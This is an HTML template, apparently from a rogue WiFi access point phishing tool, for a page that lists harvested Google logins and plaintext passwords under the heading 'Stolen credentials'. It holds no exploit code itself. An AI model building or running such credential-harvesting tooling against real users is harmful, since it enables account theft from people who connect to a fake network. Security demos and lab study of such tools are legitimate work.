{% extends "base.html" %}

{% block content %}
<div class="container-sm d-flex flex-column justify-content-center mx-xl mt-5">
    <h1>Stolen credentials</h1>
    {% if credentials %}
    <p>These all are the Google logins gathered from the WiFi Access Point.</p>
    <table class="table table-striped">
        <thead>
            <tr>
                <th>Login</th>
                <th>Password</th>
            </tr>
        </thead>
        <tbody>
            {% for creds in credentials %}
            <tr>
                <td>{{ creds.email_or_phone }}</td>
                <td>{{ creds.password }}</td>
            </tr>
            {% endfor %}
        </tbody>
    </table>
    {% else %}
    <p>There are currently no Google credentials captured.</p>
    {% endif %}
    <ul>
    </ul>
</div>
{% endblock %}